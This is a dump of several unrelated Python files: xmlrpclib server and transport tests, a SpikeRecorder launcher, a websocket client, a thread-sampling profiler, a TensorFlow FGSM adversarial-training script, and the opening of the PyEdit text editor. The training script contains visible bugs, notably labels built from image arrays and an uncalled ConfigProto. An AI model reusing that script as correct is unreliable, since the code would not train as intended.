self.requestHandler.encode_threshold = None #no encoding
self.assertEqual(p.pow(6,8), 6**8)
a = t.response_length
self.requestHandler.encode_threshold = 0 #always encode
self.assertEqual(p.pow(6,8), 6**8)
b = t.response_length
self.requestHandler.encode_threshold = old
self.assertTrue(a>b)
def test_gzip_decode_limit(self):
max_gzip_decode = 20 * 1024 * 1024
data = '\0' * max_gzip_decode
encoded = xmlrpclib.gzip_encode(data)
decoded = xmlrpclib.gzip_decode(encoded)
self.assertEqual(len(decoded), max_gzip_decode)
data = '\0' * (max_gzip_decode + 1)
encoded = xmlrpclib.gzip_encode(data)
with self.assertRaisesRegexp(ValueError,
"max gzipped payload length exceeded"):
xmlrpclib.gzip_decode(encoded)
xmlrpclib.gzip_decode(encoded, max_decode=-1)
#Test special attributes of the ServerProxy object
class ServerProxyTestCase(unittest.TestCase):
def setUp(self):
unittest.TestCase.setUp(self)
if threading:
self.url = URL
else:
# Without threading, http_server() and http_multi_server() will not
# be executed and URL is still equal to None. 'http://' is a just
# enough to choose the scheme (HTTP)
self.url = 'http://'
def test_close(self):
p = xmlrpclib.ServerProxy(self.url)
self.assertEqual(p('close')(), None)
def test_transport(self):
t = xmlrpclib.Transport()
p = xmlrpclib.ServerProxy(self.url, transport=t)
self.assertEqual(p('transport'), t)
# This is a contrived way to make a failure occur on the server side
# in order to test the _send_traceback_header flag on the server
class FailingMessageClass(mimetools.Message):
def __getitem__(self, key):
key = key.lower()
if key == 'content-length':
return 'I am broken'
return mimetools.Message.__getitem__(self, key)
@unittest.skipUnless(threading, 'Threading required for this test.')
class FailingServerTestCase(unittest.TestCase):
def setUp(self):
self.evt = threading.Event()
# start server thread to handle requests
serv_args = (self.evt, 1)
threading.Thread(target=http_server, args=serv_args).start()
# wait for the server to be ready
self.evt.wait()
self.evt.clear()
def tearDown(self):
# wait on the server thread to terminate
self.evt.wait()
# reset flag
SimpleXMLRPCServer.SimpleXMLRPCServer._send_traceback_header = False
# reset message class
SimpleXMLRPCServer.SimpleXMLRPCRequestHandler.MessageClass = mimetools.Message
def test_basic(self):
# check that flag is false by default
flagval = SimpleXMLRPCServer.SimpleXMLRPCServer._send_traceback_header
self.assertEqual(flagval, False)
# enable traceback reporting
SimpleXMLRPCServer.SimpleXMLRPCServer._send_traceback_header = True
# test a call that shouldn't fail just as a smoke test
try:
p = xmlrpclib.ServerProxy(URL)
self.assertEqual(p.pow(6,8), 6**8)
except (xmlrpclib.ProtocolError, socket.error), e:
# ignore failures due to non-blocking socket 'unavailable' errors
if not is_unavailable_exception(e):
# protocol error; provide additional information in test output
self.fail("%s\n%s" % (e, getattr(e, "headers", "")))
def test_fail_no_info(self):
# use the broken message class
SimpleXMLRPCServer.SimpleXMLRPCRequestHandler.MessageClass = FailingMessageClass
try:
p = xmlrpclib.ServerProxy(URL)
p.pow(6,8)
except (xmlrpclib.ProtocolError, socket.error), e:
# ignore failures due to non-blocking socket 'unavailable' errors
if not is_unavailable_exception(e) and hasattr(e, "headers"):
# The two server-side error headers shouldn't be sent back in this case
self.assertTrue(e.headers.get("X-exception") is None)
self.assertTrue(e.headers.get("X-traceback") is None)
else:
self.fail('ProtocolError not raised')
def test_fail_with_info(self):
# use the broken message class
SimpleXMLRPCServer.SimpleXMLRPCRequestHandler.MessageClass = FailingMessageClass
# Check that errors in the server send back exception/traceback
# info when flag is set
SimpleXMLRPCServer.SimpleXMLRPCServer._send_traceback_header = True
try:
p = xmlrpclib.ServerProxy(URL)
p.pow(6,8)
except (xmlrpclib.ProtocolError, socket.error), e:
# ignore failures due to non-blocking socket 'unavailable' errors
if not is_unavailable_exception(e) and hasattr(e, "headers"):
# We should get error info in the response
expected_err = "invalid literal for int() with base 10: 'I am broken'"
self.assertEqual(e.headers.get("x-exception"), expected_err)
self.assertTrue(e.headers.get("x-traceback") is not None)
else:
self.fail('ProtocolError not raised')
class CGIHandlerTestCase(unittest.TestCase):
def setUp(self):
self.cgi = SimpleXMLRPCServer.CGIXMLRPCRequestHandler()
def tearDown(self):
self.cgi = None
def test_cgi_get(self):
with test_support.EnvironmentVarGuard() as env:
env['REQUEST_METHOD'] = 'GET'
# if the method is GET and no request_text is given, it runs handle_get
# get sysout output
with test_support.captured_stdout() as data_out:
self.cgi.handle_request()
# parse Status header
data_out.seek(0)
handle = data_out.read()
status = handle.split()[1]
message = ' '.join(handle.split()[2:4])
self.assertEqual(status, '400')
self.assertEqual(message, 'Bad Request')
def test_cgi_xmlrpc_response(self):
data = """<?xml version='1.0'?>
<methodCall>
<methodName>test_method</methodName>
<params>
<param>
<value><string>foo</string></value>
</param>
<param>
<value><string>bar</string></value>
</param>
</params>
</methodCall>
"""
with test_support.EnvironmentVarGuard() as env, \
test_support.captured_stdout() as data_out, \
test_support.captured_stdin() as data_in:
data_in.write(data)
data_in.seek(0)
env['CONTENT_LENGTH'] = str(len(data))
self.cgi.handle_request()
data_out.seek(0)
# will respond exception, if so, our goal is achieved ;)
handle = data_out.read()
# start with 44th char so as not to get http header, we just need only xml
self.assertRaises(xmlrpclib.Fault, xmlrpclib.loads, handle[44:])
# Also test the content-length returned by handle_request
# Using the same test method inorder to avoid all the datapassing
# boilerplate code.
# Test for bug: http://bugs.python.org/issue5040
content = handle[handle.find("<?xml"):]
self.assertEqual(
int(re.search('Content-Length: (\d+)', handle).group(1)),
len(content))
class FakeSocket:
def __init__(self):
self.data = StringIO.StringIO()
def send(self, buf):
self.data.write(buf)
return len(buf)
def sendall(self, buf):
self.data.write(buf)
def getvalue(self):
return self.data.getvalue()
def makefile(self, x='r', y=-1):
raise RuntimeError
def close(self):
pass
class FakeTransport(xmlrpclib.Transport):
"""A Transport instance that records instead of sending a request.
This class replaces the actual socket used by httplib with a
FakeSocket object that records the request. It doesn't provide a
response.
"""
def make_connection(self, host):
conn = xmlrpclib.Transport.make_connection(self, host)
conn.sock = self.fake_socket = FakeSocket()
return conn
class TransportSubclassTestCase(unittest.TestCase):
def issue_request(self, transport_class):
"""Return an HTTP request made via transport_class."""
transport = transport_class()
proxy = xmlrpclib.ServerProxy("http://example.com/",
transport=transport)
try:
proxy.pow(6, 8)
except RuntimeError:
return transport.fake_socket.getvalue()
return None
def test_custom_user_agent(self):
class TestTransport(FakeTransport):
def send_user_agent(self, conn):
xmlrpclib.Transport.send_user_agent(self, conn)
conn.putheader("X-Test", "test_custom_user_agent")
req = self.issue_request(TestTransport)
self.assertIn("X-Test: test_custom_user_agent\r\n", req)
def test_send_host(self):
class TestTransport(FakeTransport):
def send_host(self, conn, host):
xmlrpclib.Transport.send_host(self, conn, host)
conn.putheader("X-Test", "test_send_host")
req = self.issue_request(TestTransport)
self.assertIn("X-Test: test_send_host\r\n", req)
def test_send_request(self):
class TestTransport(FakeTransport):
def send_request(self, conn, url, body):
xmlrpclib.Transport.send_request(self, conn, url, body)
conn.putheader("X-Test", "test_send_request")
req = self.issue_request(TestTransport)
self.assertIn("X-Test: test_send_request\r\n", req)
def test_send_content(self):
class TestTransport(FakeTransport):
def send_content(self, conn, body):
conn.putheader("X-Test", "test_send_content")
xmlrpclib.Transport.send_content(self, conn, body)
req = self.issue_request(TestTransport)
self.assertIn("X-Test: test_send_content\r\n", req)
@test_support.reap_threads
def test_main():
xmlrpc_tests = [XMLRPCTestCase, HelperTestCase, DateTimeTestCase,
BinaryTestCase, FaultTestCase, TransportSubclassTestCase]
xmlrpc_tests.append(SimpleServerTestCase)
xmlrpc_tests.append(SimpleServerEncodingTestCase)
xmlrpc_tests.append(KeepaliveServerTestCase1)
xmlrpc_tests.append(KeepaliveServerTestCase2)
xmlrpc_tests.append(GzipServerTestCase)
xmlrpc_tests.append(MultiPathServerTestCase)
xmlrpc_tests.append(ServerProxyTestCase)
xmlrpc_tests.append(FailingServerTestCase)
xmlrpc_tests.append(CGIHandlerTestCase)
test_support.run_unittest(*xmlrpc_tests)
if __name__ == "__main__":
test_main()
|
__init__.py
|
# -*- coding: utf-8 -*-
import os
import sys
import platform
import multiprocessing
from multiprocessing import Process, Queue
from ._core import __doc__, run
from ._core import __file__ as module_file_path
# Fix for MacOS High Sierra, see:
# https://stackoverflow.com/questions/30669659/multiproccesing-and-error-the-process-has-forked-and-you-cannot-use-this-corefou
if platform.system() == "Darwin":
multiprocessing.set_start_method('spawn', force=True)
def _run_wrapper():
"""
A simple wrapper that changes directory before launching the SpikeRecorder pybind11 module. The module
needs to run from its location directory because it looks for files.
"""
os.chdir(os.path.dirname(os.path.abspath(__file__)))
log_file_path = os.path.join(os.path.dirname(module_file_path), 'byb.log')
run(log_file_path)
def launch(is_async: bool = False) -> multiprocessing.Process:
"""
Lauch the Backyard Brains Spike recorder application. This function launches a subprocess.
Args:
is_async: Should the this function run asynchronously. That is, should it return instantly or
block until the application closes.
Returns:
The Process containing the SpikeRecorder application.
"""
p = Process(target=_run_wrapper)
p.start()
if not is_async:
p.join()
return p
def main():
launch()
if __name__ == "__main__":
main()
|
ws_api_socket.py
|
from functools import partial
from befh.api_socket import ApiSocket
from befh.util import Logger
import websocket
import threading
import json
import time
import zlib
class WebSocketApiClient(ApiSocket):
"""
Generic REST API call
"""
def __init__(self, id, received_data_compressed=False, proxy=None):
"""
Constructor
:param id: Socket id
"""
ApiSocket.__init__(self)
self.ws = None # Web socket
self.id = id
self.wst = None # Web socket thread
self._connecting = False
self._connected = False
self._received_data_compressed = received_data_compressed
self.on_message_handlers = []
self.on_open_handlers = []
self.on_close_handlers = []
self.on_error_handlers = []
def connect(self, url,
on_message_handler=None,
on_open_handler=None,
on_close_handler=None,
on_error_handler=None,
reconnect_interval=10):
"""
:param url: Url link
:param on_message_handler: Message handler which take the message as
the first argument
:param on_open_handler: Socket open handler which take the socket as
the first argument
:param on_close_handler: Socket close handler which take the socket as
the first argument
:param on_error_handler: Socket error handler which take the socket as
the first argument and the error as the second
argument
:param reconnect_interval: The time interval for reconnection
"""
if on_message_handler is not None:
self.on_message_handlers.append(on_message_handler)
if on_open_handler is not None:
self.on_open_handlers.append(on_open_handler)
if on_close_handler is not None:
self.on_close_handlers.append(on_close_handler)
if on_error_handler is not None:
self.on_error_handlers.append(on_error_handler)
if not self._connecting and not self._connected:
Logger.info(self.__class__.__name__, "Connecting to socket <%s>..." % self.id)
self._connecting = True
self.ws = websocket.WebSocketApp(url,
on_message=partial(self.__on_message, self.ws),
on_close=partial(self.__on_close, self.ws),
on_open=partial(self.__on_open, self.ws),
on_error=partial(self.__on_error, self.ws))
self.wst = threading.Thread(target=lambda: self.__start(reconnect_interval=reconnect_interval))
self.wst.start()
else:
Logger.info(self.__class__.__name__, "Already connecting or connected <%s>..." % self.id)
return self.wst
def send(self, msg):
"""
Send message
:param msg: Message
:return:
"""
self.ws.send(msg)
def __start(self, reconnect_interval=10):
while True:
self.ws.run_forever()
Logger.info(self.__class__.__name__, "Socket <%s> is going to reconnect..." % self.id)
time.sleep(reconnect_interval)
def __on_message(self, foo, ws, m):
if self._received_data_compressed is True:
data = zlib.decompress(m, zlib.MAX_WBITS|16).decode('UTF-8')
m = json.loads(data)
else:
m = json.loads(m)
if len(self.on_message_handlers) > 0:
for handler in self.on_message_handlers:
handler(m)
def __on_open(self, foo, ws):
Logger.info(self.__class__.__name__, "Socket <%s> is opened." % self.id)
self._connected = True
if len(self.on_open_handlers) > 0:
for handler in self.on_open_handlers:
try:
handler(ws)
except Exception as e:
print(e)
def __on_close(self, foo, ws):
Logger.info(self.__class__.__name__, "Socket <%s> is closed." % self.id)
self._connecting = False
self._connected = False
if len(self.on_close_handlers) > 0:
for handler in self.on_close_handlers:
try:
handler(ws)
except Exception as e:
print(e)
def __on_error(self, foo, ws, error):
Logger.info(self.__class__.__name__, "Socket <%s> error:\n %s" % (self.id, error))
if len(self.on_error_handlers) > 0:
for handler in self.on_error_handlers:
try:
handler(ws, error)
except Exception as e:
print(e)
if __name__ == '__main__':
Logger.init_log()
socket = WebSocketApiClient('test')
socket.connect('ws://localhost', reconnect_interval=1)
time.sleep(10)
|
sampro.py
|
'''
Data is kept in two dictionaries:
1- rooted_leaf_counts; this is the amount of samples on each function/line number pair
this data can be used to answer the question "where are my threads spending their time?"
this is useful for finding hotspots; these are namespaced by root function, this is a
decent proxy for thread
Because there is at most one leaf sample integer per line of code x thread pair, this data
structure is unbounded.
2- stack_counts; this is a count of samples in each unique stack
this data gives a more detailed view, since each unique call stack
has an independent count.
Because there may be combinatorially many unique stacks, this data structure
is bounded. If the data structure overflows, a count of skipped stack samples
is kept.
'''
import sys
import threading
import signal
import collections
import time
import random
# A given call chain can be represented as a list of 2-tuples:
# [ (code object, line no), (code_object, line no) ... ]
# In particular for a sampling profiler, we are interested in
# seeing which "call patterns" are hot, so the representation used will be:
# { (caller code object, caller line no, callee code object) : count }
class _BaseSampler(object):
'''
A Sampler that will periodically sample the running stacks of all Python threads.
'''
def __init__(self):
self.rooted_leaf_counts = collections.defaultdict(lambda: collections.defaultdict(int))
self.stack_counts = {}
self.max_stacks = 10000
self.skipped_stack_samples = 0
self.sample_count = 0 # convenience for calculating percentages
def sample(self):
self.sample_count += 1
sampler_frame = sys._getframe()
cur_samples = []
for thread_id, frame in sys._current_frames().items():
if frame is sampler_frame:
continue
stack = []
cur = frame
while cur:
stack.extend((cur.f_code, cur.f_lineno))
cur, last = cur.f_back, cur
self.rooted_leaf_counts[last.f_code][(frame.f_code, frame.f_lineno)] += 1
stack = tuple(stack)
if stack not in self.stack_counts:
if len(self.stack_counts) > self.max_stacks:
self.skipped_stack_samples += 1
self.stack_counts[stack] = 1
else:
self.stack_counts[stack] += 1
def live_data_copy(self):
rooted_leaf_counts = {}
for k, v in self.rooted_leaf_counts.items():
rooted_leaf_counts[k] = dict(v)
return rooted_leaf_counts, dict(self.stack_counts)
def rooted_samples_by_file(self):
'''
Get sample counts by file, and root thread function.
(Useful for answering quesitons like "what modules are hot?")
'''
rooted_leaf_samples, _ = self.live_data_copy()
rooted_file_samples = {}
for root, counts in rooted_leaf_samples.items():
cur = {}
for key, count in counts.items():
code, lineno = key
cur.setdefault(code.co_filename, 0)
cur[code.co_filename] += count
rooted_file_samples[root] = cur
return rooted_file_samples
def rooted_samples_by_line(self, filename):
'''
Get sample counts by line, and root thread function.
(For one file, specified as a parameter.)
This is useful for generating "side-by-side" views of
source code and samples.
'''
rooted_leaf_samples, _ = self.live_data_copy()
rooted_line_samples = {}
for root, counts in rooted_leaf_samples.items():
cur = {}
for key, count in counts.items():
code, lineno = key
if code.co_filename != filename:
continue
cur[lineno] = count
rooted_line_samples[root] = cur
return rooted_line_samples
def hotspots(self):
'''
Get lines sampled accross all threads, in order
from most to least sampled.
'''
rooted_leaf_samples, _ = self.live_data_copy()
line_samples = {}
for _, counts in rooted_leaf_samples.items():
for key, count in counts.items():
line_samples.setdefault(key, 0)
line_samples[key] += count
return sorted(
line_samples.items(), key=lambda v: v[1], reverse=True)
def flame_map(self):
'''
return sampled stacks in form suitable for inclusion in a
flame graph (https://github.com/brendangregg/FlameGraph)
'''
flame_map = {}
_, stack_counts = self.live_data_copy()
for stack, count in stack_counts.items():
root = stack[-2].co_name
stack_elements = []
for i in range(len(stack)):
if type(stack[i]) in (int, long):
continue
code = stack[i]
stack_elements.append("{0}`{1}`{2}".format(
root, code.co_filename, code.co_name))
flame_key = ';'.join(stack_elements)
flame_map.setdefault(flame_key, 0)
flame_map[flame_key] += count
return flame_map
def start(self):
raise NotImplemented()
def stop(self):
raise NotImplemented()
class ThreadedSampler(_BaseSampler):
'''
This implementation relies on a thread and sleep.
'''
def __init__(self):
super(ThreadedSampler, self).__init__()
self.stopping = threading.Event()
self.data_lock = threading.Lock()
self.thread = None
self.started = False
def start(self):
'start a background thread that will sample ~50x per second'
if self.started:
raise ValueError("Sampler.start() may only be called once")
self.started = True
self.thread = threading.Thread(target=self._run)
self.thread.daemon = True
self.thread.start()
def stop(self):
self.stopping.set()
def _run(self):
while not self.stopping.wait(0.01 * (1 + random.random())):
self.sample()
# sample 50x per second
# NOTE: sleep for a random amount of time to avoid syncing with
# other processes (e.g. if another thread is doing something at
# a regular interval, we may always catch that process at the
# same point in its cycle)
Sampler = ThreadedSampler
if hasattr(signal, "setitimer"):
class SignalSampler(_BaseSampler):
def __init__(self, which="real"):
'''
Gather performance samples ~50x / second using interrupt timers.
One of "real", "virtual", or "prof".
From setitimer man page, meaning of these values:
real: decrements in real time, and delivers SIGALRM upon expiration.
virtual: decrements only when the process is executing, and
delivers SIGVTALRM upon expiration.
prof: decrements both when the process executes and when the
system is executing on behalf of the process. Coupled
with ITIMER_VIRTUAL, this timer is usually used to
profile the time spent by the application in user and
kernel space. SIGPROF is delivered upon expiration.
Note that signals are inherently global for the entire process.
'''
super(SignalSampler, self).__init__()
try:
_which = {
'real': signal.ITIMER_REAL,
'virtual': signal.ITIMER_VIRTUAL,
'prof': signal.ITIMER_PROF
}[which]
except KeyError:
raise ValueError("which must be one of 'real', 'virtual', or 'prof'"
" (got {0})".format(repr(which)))
self.which = _which
self.signal = {
signal.ITIMER_REAL: signal.SIGALRM,
signal.ITIMER_VIRTUAL: signal.SIGVTALRM,
signal.ITIMER_PROF: signal.SIGPROF}[self.which]
if signal.getsignal(self.signal) not in (None, signal.SIG_DFL, signal.SIG_IGN):
raise EnvironmentError("handler already attached for signal")
self.started = False
self.stopping = False
def start(self):
'start sampling interrupts'
if self.started:
return
self.started = True
self.rollback = signal.signal(self.signal, self._resample)
signal.setitimer(self.which, 0.01 * (1 + random.random()))
def stop(self):
if not self.started:
return
self.stopping = True
signal.setitimer(self.which, 0)
signal.signal(self.signal, self.rollback)
def _resample(self, signum, frame):
if self.stopping:
return
self.sample()
signal.setitimer(self.which, 0.01 * (1 + random.random()))
Sampler = SignalSampler
|
train.py
|
import threading
from time import time
import tensorflow as tf
from models.load_data import *
from tensorflow.contrib.slim.nets import inception
from adv_imagenet_models import inception_resnet_v2
from attacks import fgsm
summary_path = '/home/yangfan/ensemble_training'
ALPHA = 0.5
EPSILON = 0.3
learning_rate = 0.001
display_step = 100
test_step = 100
epochs = 90
save_path = '/home/yangfan/ensemble_training/ens4-inception.ckpt'
train_size = imagenet_size()
num_batches = int(float(train_size) / BATCH_SIZE)
x = tf.placeholder(dtype=tf.float32, shape=[None, 299, 299, 3])
y = tf.placeholder(dtype=tf.float32, shape=[None, 1000])
lr = tf.placeholder(tf.float32)
# keep_prob = tf.placeholder(tf.float32)
with tf.device('/cpu:0'):
q = tf.FIFOQueue(BATCH_SIZE, [tf.float32, tf.float32], shapes=[[299, 299, 3], [1000]])
enqueue_op = q.enqueue_many([x, y])
x_b, y_b = q.dequeue_many(BATCH_SIZE / 4)
logits, end_points = inception.inception_v3(x_b, is_training=True)
with tf.name_scope('cross_entropy'):
cross_entropy = tf.nn.softmax_cross_entropy_with_logits(labels=y_b, logits=logits)
with tf.name_scope('l2_loss'):
l2_loss = tf.reduce_sum(5e-4 * tf.stack([tf.nn.l2_loss(v) for v in tf.get_collection('weights')]))
tf.summary.scalar('l2_loss', l2_loss)
with tf.name_scope('loss'):
loss = cross_entropy + l2_loss
tf.summary.scalar('loss', loss)
with tf.name_scope('accuracy'):
correct = tf.equal(tf.argmax(logits, 1), tf.argmax(y, 1))
accuracy = tf.reduce_mean(tf.cast(correct, tf.float32))
tf.summary.scalar('accuracy', accuracy)
global_step = tf.Variable(0, trainable=False)
epoch = tf.div(global_step, num_batches)
with tf.name_scope('optimizer'):
optimizer = tf.train.MomentumOptimizer(learning_rate=lr, momentum=0.9).minimize(loss, global_step=global_step)
merged = tf.summary.merge_all()
saver = tf.train.Saver()
coord = tf.train.Coordinator()
init = tf.global_variables_initializer()
def get_adversarial(sess_trained, x, probs, image):
x_adv = fgsm(x=x, predictions=probs, eps=0.3, clip_max=1.0, clip_min=-1.0)
img_adv = sess_trained.run(x_adv, feed_dict={x:image})
return img_adv
with tf.Session(config=tf.ConfigProto) as sess_train:
sess_train.run(init)
def enqueue_batches():
while not coord.should_stop():
ori_imgs, labels = read_batch(batch_size=BATCH_SIZE/2)
adv_imgs = get_adversarial(sess_trained=sess_train, x=x_b, probs=end_points['Predictions'], image=ori_imgs)
imgs = np.vstack([ori_imgs, adv_imgs])
lbs = np.vstack([ori_imgs, adv_imgs])
sess_train.run(enqueue_op, feed_dict={x:imgs, y:lbs})
num_threads = 4
for i in range(num_threads):
t = threading.Thread(target=enqueue_batches)
t.setDaemon(True)
t.start()
train_writer = tf.summary.FileWriter(os.path.join(summary_path, 'train'), sess_train.graph)
start_time = time()
for e in range(sess_train.run(epoch), epochs):
for i in range(num_batches):
_, step = sess_train.run([optimizer, global_step], feed_dict={lr:learning_rate})
if step == 170000 or step == 350000:
learning_rate /= 10
if step % display_step == 0:
c, a = sess_train.run([loss, accuracy], feed_dict={lr:learning_rate})
print('Epoch: {:03d} Step/Batch: {:09d} --- Loss: {:.7f} Training accuracy: {:.4f}'.format(e, step, c, a))
if step % test_step == 0:
pass
end_time = time()
print('Elapsed time: {}').format(format_time(end_time - start_time))
saved = saver.save(sess_train, save_path)
print('Variables saved in file: %s' % saved)
coord.request_stop()
|
_nonunicode-textEditor.py
|
"""
################################################################################
PyEdit 2.1: a Python/tkinter text file editor and component.
Uses the Tk text widget, plus GuiMaker menus and toolbar buttons to
implement a full-featured text editor that can be run as a standalone
program, and attached as a component to other GUIs. Also used by
PyMailGUI and PyView to edit mail text and image file notes, and by
PyMailGUI and PyDemos in pop-up mode to display source and text files.
New in version 2.1:
-updated to run under Python 3.1
-added "grep" search menu option and dialog: threaded external files search
-update change and font dialog implementations to allow many to be open
-verify app exit on quit if changes in other edit windows in process
-runs self.update() before setting text in new editor for loadFirst
-use base name after chdir to run code file, not possibly relative path
-use launch modes that support arguments for run code file mode on Windows
-run code inherits launchmodes backslash conversion (no longer required)
New in version 2.0:
-added simple font components input dialog
-use Tk 8.4 undo stack API to add undo/redo text modifications
-now verifies on quit, open, new, run, only if text modified and unsaved
-searches are case-insensitive now by default
-configuration module for initial font/color/size/searchcase
TBD (and suggested exercises):
-could also allow search case choice in GUI (not just config file)
-could use re patterns for searches (see text chapter)
-could experiment with syntax-directed text colorization (see IDLE)
-could try to verify app exit for quit() in non-managed windows too?
-could queue each result as found in grep dialog thread to avoid delay
-could use images in toolbar buttons (per examples in Chapter 9)
Unicode TBD:
-could open input files in binary mode to better support viewing arbitrary
Unicode text, but Text content is returned as decoded str whether bytes or
str was inserted, so we'd need the encoding type to save or encode (see
Chapter 9); as is, clients can still read text as bytes from binary-mode
files before creating a texteditor and insert it manually, but file saves
may fail if the bytes viewed cannot be encoded per the platform default;
probably, we need to expect an encoding name to be passed in, or ask the
user for the encoding if the platform default and common guesses fail;
################################################################################
"""
Version = '2.1'
import sys, os # platform, args, run tools
from tkinter import * # base widgets, constants
from tkinter.filedialog import Open, SaveAs # standard dialogs
from tkinter.messagebox import showinfo, showerror, askyesno
from tkinter.simpledialog import askstring, askinteger
from tkinter.colorchooser import askcolor
from PP4E.Gui.Tools.guimaker import * # Frame + menu/toolbar builders
try:
import textConfig # startup font and colors
configs = textConfig.__dict__ # work if not on the path or bad
except:
configs = {}
helptext = """PyEdit version %s
April, 2010
(2.0: January, 2006)
(1.0: October, 2000)
Programming Python, 4th Edition
O'Reilly Media, Inc.
A text editor program and embeddable object
component, written in Python/tkinter. Use
menu tear-offs and toolbar for quick access
to actions, and Alt-key shortcuts for menus.
Additions in version %s:
- supports Python 3.X
- grep external files search dialog
- allow multiple change and font dialogs
- verify app quit if other edit windows changed
Prior version additions:
- font pick dialog
- unlimited undo/redo
- quit/open/new/run prompt save only if changed
- searches are case-insensitive
- startup configuration module textConfig.py
"""
START = '1.0' # index of first char: row=1,col=0
SEL_FIRST = SEL + '.first' # map sel tag to index
SEL_LAST = SEL + '.last' # same as 'sel.last'
FontScale = 0 # use bigger font on Linux
if sys.platform[:3] != 'win': # and other non-Windows boxes
FontScale = 3
################################################################################
# Main class: implements editor GUI, actions
# requires a flavor of GuiMaker to be mixed in by mode specific subclasses;
# not a direct subclass of GuiMaker because that comes in multiple forms.
################################################################################
class TextEditor: # mix with menu/toolbar Frame class
startfiledir = '.' # for dialogs
editwindows = [] # for process-wide quit check
ftypes = [('All files', '*'), # for file open dialog
('Text files', '.txt'), # customize in subclass
('Python files', '.py')] # or set in each instance
colors = [{'fg':'black', 'bg':'white'}, # color pick list
{'fg':'yellow', 'bg':'black'}, # first item is default
{'fg':'white', 'bg':'blue'}, # tailor me as desired
{'fg':'black', 'bg':'beige'}, # or do PickBg/Fg chooser
{'fg':'yellow', 'bg':'purple'},
{'fg':'black', 'bg':'brown'},
{'fg':'lightgreen', 'bg':'darkgreen'},
{'fg':'darkblue', 'bg':'orange'},
{'fg':'orange', 'bg':'darkblue'}]
fonts = [('courier', 9+FontScale, 'normal'), # platform-neutral fonts
('courier', 12+FontScale, 'normal'), # (family, size, style)
('courier', 10+FontScale, 'bold'), # or pop up a listbox
('courier', 10+FontScale, 'italic'), # make bigger on Linux
('times', 10+FontScale, 'normal'), # use 'bold italic' for 2
('helvetica', 10+FontScale, 'normal'), # also 'underline', etc.
('ariel', 10+FontScale, 'normal'),
('system', 10+FontScale, 'normal'),
('courier', 20+FontScale, 'normal')]
def __init__(self, loadFirst=''):
if not isinstance(self, GuiMaker):
raise TypeError('TextEditor needs a GuiMaker mixin')
self.setFileName(None)
self.lastfind = None
self.openDialog = None
self.saveDialog = None
self.text.focus() # else must click in text
if loadFirst:
self.update() # 2.1: else @ line 2; see book
self.onOpen(loadFirst)
def start(self): # run by GuiMaker.__init__
self.menuBar = [ # configure menu/toolbar
('File', 0, # a GuiMaker menu def tree
[('Open...', 0, self.onOpen), # build in method for self
('Save', 0, self.onSave), # label, shortcut, callback
('Save As...', 5, self.onSaveAs),
('New', 0, self.onNew),
'separator',
('Quit...', 0, self.onQuit)]
),
('Edit', 0,
[('Undo', 0, self.onUndo),
('Redo', 0, self.onRedo),
'separator',
('Cut', 0, self.onCut),
('Copy', 1, self.onCopy),
('Paste', 0, self.onPaste),
'separator',
('Delete', 0, self.onDelete),
('Select All', 0, self.onSelectAll)]
),
('Search', 0,
[('Goto...', 0, self.onGoto),
('Find...', 0, self.onFind),
('Refind', 0, self.onRefind),
('Change...', 0, self.onChange),
('Grep...', 3, self.onGrep)]
),
('Tools', 0,
[('Pick Font...', 6, self.onPickFont),
('Font List', 0, self.onFontList),
'separator',
('Pick Bg...', 3, self.onPickBg),
('Pick Fg...', 0, self.onPickFg),
('Color List', 0, self.onColorList),
'separator',
('Info...', 0, self.onInfo),
('Clone', 1, self.onClone),
('Run Code', 0, self.onRunCode)]
)]
self.toolBar = [
('Save', self.onSave, {'side': LEFT}),
('Cut', self.onCut, {'side': LEFT}),
('Copy', self.onCopy, {'side': LEFT}),
('Paste', self.onPaste, {'side': LEFT}),
('Find', self.onRefind, {'side': LEFT}),
('Help', self.help, {'side': RIGHT}),
('Quit', self.onQuit, {'side': RIGHT})]
def makeWidgets(self): # run by GuiMaker.__init__
name = Label(self, bg='black', fg='white') # add below menu, above tool
name.pack(side=TOP, fill=X) # menu/toolbars are packed
# GuiMaker frame packs itself
vbar = Scrollbar(self)
hbar = Scrollbar(self, orient='horizontal')
text = Text(self, padx=5, wrap='none') # disable line wrapping
text.config(undo=1, autoseparators=1) # 2.0, default is 0, 1
vbar.pack(side=RIGHT, fill=Y)
hbar.pack(side=BOTTOM, fill=X) # pack text last
text.pack(side=TOP, fill=BOTH, expand=YES) # else sbars clipped
text.config(yscrollcommand=vbar.set) # call vbar.set on text move
text.config(xscrollcommand=hbar.set)
vbar.config(command=text.yview) # call text.yview on scroll move
hbar.config(command=text.xview) # or hbar['command']=text.xview
# 2.0: apply user configs or defaults
startfont = configs.get('font', self.fonts[0])
startbg = configs.get('bg', self.colors[0]['bg'])
startfg = configs.get('fg', self.colors[0]['fg'])
text.config(font=startfont, bg=startbg, fg=startfg)
if 'height' in configs: text.config(height=configs['height'])
if 'width' in configs: text.config(width =configs['width'])
self.text = text
self.filelabel = name
############################################################################
# File menu commands
############################################################################
def my_askopenfilename(self): # objects remember last result dir/file
if not self.openDialog:
self.openDialog = Open(initialdir=self.startfiledir,
filetypes=self.ftypes)
return self.openDialog.show()
def my_asksaveasfilename(self): # objects remember last result dir/file
if not self.saveDialog:
self.saveDialog = SaveAs(initialdir=self.startfiledir,
filetypes=self.ftypes)
return self.saveDialog.show()
def onOpen(self, loadFirst=''):
doit = (not self.text_edit_modified() or # 2.0
askyesno('PyEdit', 'Text has changed: discard changes?'))
if doit:
file = loadFirst or self.my_askopenfilename()
if file:
try:
text = open(file, 'r').read()
except:
showerror('PyEdit', 'Could not open file ' + file)
else:
self.setAllText(text)
self.setFileName(file)
self.text.edit_reset() # 2.0: clear undo/redo stks
self.text.edit_modified(0) # 2.0: clear modified flag
def onSave(self):
self.onSaveAs(self.currfile) # may be None
def onSaveAs(self, forcefile=None):
file = forcefile or self.my_asksaveasfilename()
if file:
text = self.getAllText()
try:
open(file, 'w').write(text)
except:
showerror('PyEdit', 'Could not write file ' + file)
else:
self.setFileName(file) # may be newly created
self.text.edit_modified(0) # 2.0: clear modified flag
# don't clear undo/redo stks
def onNew(self):
doit = (not self.text_edit_modified() or # 2.0
askyesno('PyEdit', 'Text has changed: discard changes?'))
if doit:
self.setFileName(None)
self.clearAllText()
self.text.edit_reset() # 2.0: clear undo/redo stks
self.text.edit_modified(0) # 2.0: clear modified flag
def onQuit(self):
"""
on Quit menu/toolbar select and wm border X button in toplevel windows;
2.1: don't exit app if others changed; 2.0: don't ask if self unchanged;
moved to the top-level window classes at the end since may vary per usage:
a Quit in GUI might quit() to exit, destroy() just one Toplevel, Tk, or
edit frame, or not be provided at all when run as an attached component;
